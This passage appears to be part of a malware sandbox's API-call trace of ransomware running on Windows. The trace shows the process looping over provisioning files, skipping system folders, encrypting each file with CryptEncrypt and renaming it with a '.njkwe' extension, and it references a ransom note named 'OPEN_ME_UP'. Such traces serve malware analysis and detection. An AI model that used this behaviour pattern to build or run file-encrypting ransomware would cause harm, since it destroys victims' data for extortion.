ftCreationTime.dwLowDateTime=0x904aa5c6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904aa5c6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904aa5c6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml", cAlternateFileName="114__C~1.PRO")) returned 1 [0076.488] lstrcmpiW (lpString1="114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.488] lstrcmpiW (lpString1="114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.488] lstrcmpiW (lpString1="114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.488] lstrcmpiW (lpString1="114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.488] lstrcmpiW (lpString1="114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.488] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml") returned 162 [0076.488] StrStrIW (lpFirst="114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.488] lstrcmpW (lpString1="114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.488] lstrcmpW (lpString1="114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.488] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\114__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.488] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\114__connections_cellular_tigo (el salvador)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.488] GetTickCount () returned 0x1153768 [0076.488] GetTickCount () returned 0x1153768 [0076.488] GetTickCount () returned 0x1153768 [0076.488] GetTickCount () returned 0x1153768 [0076.488] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.488] GetProcessHeap () returned 0xbe0000 [0076.488] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.488] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28c, lpOverlapped=0x0) returned 1 [0076.490] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.490] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28c, lpOverlapped=0x0) returned 1 [0076.490] GetProcessHeap () returned 0xbe0000 [0076.490] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.490] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.490] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.490] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.490] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.490] CloseHandle (hObject=0x43c) returned 1 [0076.491] GetProcessHeap () returned 0xbe0000 [0076.491] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.491] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0076.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\114__connections_cellular_tigo (el salvador)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\114__Connections_Cellular_TIGO (El Salvador)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\114__connections_cellular_tigo (el salvador)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.491] GetProcessHeap () returned 0xbe0000 [0076.491] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.491] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904aa5c6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904aa5c6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904aa5c6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="115__C~1.PRO")) returned 1 [0076.494] lstrcmpiW (lpString1="115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.494] lstrcmpiW (lpString1="115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.494] lstrcmpiW (lpString1="115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.494] lstrcmpiW (lpString1="115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.494] lstrcmpiW (lpString1="115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.494] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml") returned 167 [0076.494] StrStrIW (lpFirst="115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.494] lstrcmpW (lpString1="115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.494] lstrcmpW (lpString1="115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.494] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\115__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.494] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\115__connections_cellular_elisa estonia (estonia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.494] GetTickCount () returned 0x1153768 [0076.494] GetTickCount () returned 0x1153768 [0076.494] GetTickCount () returned 0x1153768 [0076.494] GetTickCount () returned 0x1153768 [0076.494] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.495] GetProcessHeap () returned 0xbe0000 [0076.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.495] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0076.496] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.496] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0076.496] GetProcessHeap () returned 0xbe0000 [0076.496] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.496] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.496] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.497] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.497] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.497] CloseHandle (hObject=0x43c) returned 1 [0076.497] GetProcessHeap () returned 0xbe0000 [0076.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.497] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 187 [0076.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\115__connections_cellular_elisa estonia (estonia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\115__Connections_Cellular_Elisa Estonia (Estonia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\115__connections_cellular_elisa estonia (estonia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.498] GetProcessHeap () returned 0xbe0000 [0076.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.498] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904d0836, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904d0836, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904d0836, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="116__C~1.PRO")) returned 1 [0076.498] lstrcmpiW (lpString1="116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.498] lstrcmpiW (lpString1="116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.498] lstrcmpiW (lpString1="116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.498] lstrcmpiW (lpString1="116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.498] lstrcmpiW (lpString1="116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.498] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml") returned 157 [0076.498] StrStrIW (lpFirst="116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.498] lstrcmpW (lpString1="116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.498] lstrcmpW (lpString1="116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.498] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\116__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\116__connections_cellular_emt (estonia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.498] GetTickCount () returned 0x1153768 [0076.498] GetTickCount () returned 0x1153768 [0076.498] GetTickCount () returned 0x1153768 [0076.498] GetTickCount () returned 0x1153768 [0076.498] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.499] GetProcessHeap () returned 0xbe0000 [0076.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.499] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0076.503] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.503] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0076.503] GetProcessHeap () returned 0xbe0000 [0076.503] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.503] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.503] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.503] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.504] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.504] CloseHandle (hObject=0x43c) returned 1 [0076.504] GetProcessHeap () returned 0xbe0000 [0076.504] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.504] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0076.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\116__connections_cellular_emt (estonia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\116__Connections_Cellular_EMT (Estonia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\116__connections_cellular_emt (estonia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.504] GetProcessHeap () returned 0xbe0000 [0076.504] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.504] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904d0836, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904d0836, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904d0836, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="117__C~1.PRO")) returned 1 [0076.505] lstrcmpiW (lpString1="117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.505] lstrcmpiW (lpString1="117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.505] lstrcmpiW (lpString1="117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.505] lstrcmpiW (lpString1="117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.505] lstrcmpiW (lpString1="117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.505] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml") returned 157 [0076.505] StrStrIW (lpFirst="117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.505] lstrcmpW (lpString1="117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.505] lstrcmpW (lpString1="117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.505] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\117__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.505] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\117__connections_cellular_emt (estonia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.505] GetTickCount () returned 0x1153777 [0076.505] GetTickCount () returned 0x1153777 [0076.505] GetTickCount () returned 0x1153777 [0076.505] GetTickCount () returned 0x1153777 [0076.505] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.505] GetProcessHeap () returned 0xbe0000 [0076.505] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.505] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0076.509] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.509] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0076.509] GetProcessHeap () returned 0xbe0000 [0076.509] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.509] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.509] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.509] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.509] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.510] CloseHandle (hObject=0x43c) returned 1 [0076.510] GetProcessHeap () returned 0xbe0000 [0076.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.510] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\117__Connections_Cellular_EMT 